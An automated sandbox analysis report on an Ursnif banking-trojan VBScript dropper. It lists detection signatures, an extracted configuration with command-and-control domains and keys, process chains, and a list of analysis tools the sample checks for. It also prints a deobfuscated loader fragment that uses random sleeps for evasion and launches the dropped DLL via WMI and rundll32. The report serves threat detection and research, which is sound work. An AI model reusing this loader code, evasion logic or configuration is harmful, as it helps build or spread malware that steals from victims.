Windows Analysis Report
gnAYDP69br2v.vbs

Overview

General Information

Sample Name: gnAYDP69br2v.vbs
Analysis ID: 560537
MD5: 694a1a5ee37e5c161a37d4166a677850
SHA1: adfdbca254f8f810735cf2224aca1630af762bea
SHA256: 0993c606df923ac8f174d7789fb494633c89d99d48747a91b866dc410cbd5814
Infos:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Antivirus detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Deletes itself after installation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "YH51zbw68XXolzw8uQmujXgr7vnasuZcFgH7AJ2kGBzL4PhjIyVzy5MDJsglBibg5h0RNR44WiefAtoK6SAdWueylFfdzQd683oCOk4rKCggPtdTeSl7hrve2I0aDaCBkoeiOxpSRC00pY0DaAjoBH1DxdU5ti0d0lMA4aqyGSJ+NcMQxJbjly/3eM1JgxTeRv8qfeoCn1t6fo9nKZliSXvxzEf8TXf46mNAineKBDDVsAYvylxjeMV9NuQnAN5bCZLiyp7C5x9eiMqtTEAUnFh9cMrGskg6XvfPGY7auFDj9EDMWtYHKhgHVdRDPVkTTSsGy44FUesZ+6Z4Xw7vU9rgofRZORY0rQQe0OFqz4s=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "2500", "server": "580", "serpent_key": "gX5RILpAQgp3pEaS", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\melange.yuv Avira: detection malicious, Label: TR/AD.UrsnifDropper.vsbvn
Source: Binary string: c:\shell\town.Woman\interest\will.pdb source: rundll32.exe, 00000017.00000002.882547399.0000000070017000.00000002.00000001.01000000.0000000C.sdmp, melange.yuv.0.dr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7000EEA1 FindFirstFileExW, 23_2_7000EEA1

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected Ursnif
Source: Yara match File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud
barindex
Yara detected Ursnif
Source: Yara match File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA2274 23_2_6FFA2274
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7000CA4A 23_2_7000CA4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70003761 23_2_70003761
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 70002290 appears 34 times
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 23_2_6FFA14FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA1B4A NtMapViewOfSection, 23_2_6FFA1B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA1382 GetProcAddress,NtCreateSection,memset, 23_2_6FFA1382
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA2495 NtQueryVirtualMemory, 23_2_6FFA2495
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Java / VBScript file with very long strings (likely obfuscated code)
Source: gnAYDP69br2v.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@6/2@0/0
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"
Source: gnAYDP69br2v.vbs Static file information: File size 2488066 > 1048576
Source: Binary string: c:\shell\town.Woman\interest\will.pdb source: rundll32.exe, 00000017.00000002.882547399.0000000070017000.00000002.00000001.01000000.0000000C.sdmp, melange.yuv.0.dr

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)REM feud policy theology irate liven comparator Ralph megavolt televise gift alarm cultivable javelin ovary Rufus craven bevy hunt ugly marrowbone magnetic End WithDim quadrupole: Set quadrupole = CreateObject("WScript.Shell")Dim Ijil: Set Ijil = CreateObject("Scripting.FileSystemObject")If (Ijil.FileExists(SvurK + "adobe.url")) Then' clubhouse turbulent delegate, 5083367 intend academia involution imperishable convulsion fee clandestine springtime stearic tibia condemnatory crook handkerchief orphanage tepid fence teapot ocph("DEBUG: F_LOCKFILE - False")ROpElseWith quadrupole.createShortcut(SvurK + "adobe.url").TargetPath = "https://adobe.com".Save()End Withocph("DEBUG: F_LOCKFILE - True")' salon Coddington fast McBride sunset February croft mannequin acuity purvey vindictive End IfEnd FunctionFunction weHra()ocph("DEBUG: F_RUN - Start")UuH=60000' strontium deoxyribose testicle carpetbagger thulium lye Silas standpoint confirm lavish ragging, raven broadloom collar moral, Mecca standard songbird Harlan earnest exfoliate soupy=40000RandomizeSet BYkLiService = GetObject("winmg" + "mts:Win32_Pro" + "cess")REM spill family towhead honeysuckle alkaloid. 4079355 wholesome usurpation sheath suffer oilmen whimsey emerald Morgan, 4462814 If (InStr(WScript.ScriptName, cStr(58462)) > 0 And sapsucker = 0) ThenChiangWith WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)End Witharchetype471 = "ca" + "lc.e" + "xe"' eft enormous Muzak Thor Polynesia pendant Dempsey contraception phosphide blockade belie clement covariant deadhead debilitate petrochemical amide BYkLiService.create archetype471ocph("DEBUG: F_RUN_T - True")ElseChiangWith WScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)End WithUCTw = "rundll32" + " " + SvurK + "melange.yuv" + ",DllRegisterServer":BYkLiService.create UCTwocph("DEBUG: F_RUN_W - True")alLA("-")EMExEnd IfEnd FunctionFunction VuibL()ocph("DEBUG: FS_CLB - Start")' fortunate assonant atrophic absolution estimate lovelorn vegetate, plumb pappy stillwater schoolgirlish on error resume nextDim UuH,soupyREM saloon Pritchard sadden. indolent rancho Semite Harrington inflater stoneware bemadden. Rochester drake800 Shattuck UuH=5000soupy=2000RandomizeWScript.Sleep Int((UuH-soupy+1)*Rnd+soupy)set BYkLi = GetObject("winmgmts:\\.\root\cimv2")' thunderflower niece mountaintop diverse roost putty duel compressible Buchenwald immutable Fomalhaut. 8154240 wont crowd carcass grownup dialectic taught curtain confederate invoke denouement set FtLaZ = BYkLi.InstancesOf("Win32_OperatingSystem")for each hSW in FtLaZaesthetic = hSW.LastBootUpTime' souvenir minuscule committal Havana heartbreak f cure helicopter tung Gorton, backorder Midwest jFE = Mid(aesthetic,1,4) & "-" & Mid(aesthetic,5,2) & "-" & Mid(aesthetic,7,2) & " " & Mid(aesthetic,9,2) & ":" & Mid(aesthetic,11,2) & ":" & Mid(aesthetic,13,2)monologistec = abs(datediff("s",jFE,now))ZuAV = monologistec \ 60REM hut orange copperhead selfadjoint clomp byline approximate t
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA2263 push ecx; ret 23_2_6FFA2273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA2210 push ecx; ret 23_2_6FFA2219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_700022D6 push ecx; ret 23_2_700022E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70001C44 push ecx; ret 23_2_70001C57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7004C4C0 push ebx; iretd 23_2_7004C4D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7004D302 push edx; ret 23_2_7004D306
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA1A0A LoadLibraryA,GetProcAddress, 23_2_6FFA1A0A
PE file contains an invalid checksum
Source: melange.yuv.0.dr Static PE information: real checksum: 0xab069 should be: 0xb1a89

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\melange.yuv Jump to dropped file
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\melange.yuv Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Yara detected Ursnif
Source: Yara match File source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\gnaydp69br2v.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.739566081.00000274BF6FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXEICAL@
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AUTORUNSC.EXEH
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SANDBOXIERPCSS.EXE@V5
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
Found evasive API chain (may stop execution after checking system information)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 7144 Thread sleep time: -30000s >= -30000s Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 375 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7000EEA1 FindFirstFileExW, 23_2_7000EEA1

Anti Debugging
barindex
Found API chain indicative of debugger detection
Source: C:\Windows\SysWOW64\rundll32.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70002116 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_70002116
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_6FFA1A0A LoadLibraryA,GetProcAddress, 23_2_6FFA1A0A
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_700081A6 mov eax, dword ptr fs:[00000030h] 23_2_700081A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7000EB9A mov eax, dword ptr fs:[00000030h] 23_2_7000EB9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7004A96D mov eax, dword ptr fs:[00000030h] 23_2_7004A96D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7004A89C mov eax, dword ptr fs:[00000030h] 23_2_7004A89C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7004A4A3 push dword ptr fs:[00000030h] 23_2_7004A4A3
Launches processes in debugging mode, may be used to hinder debugging
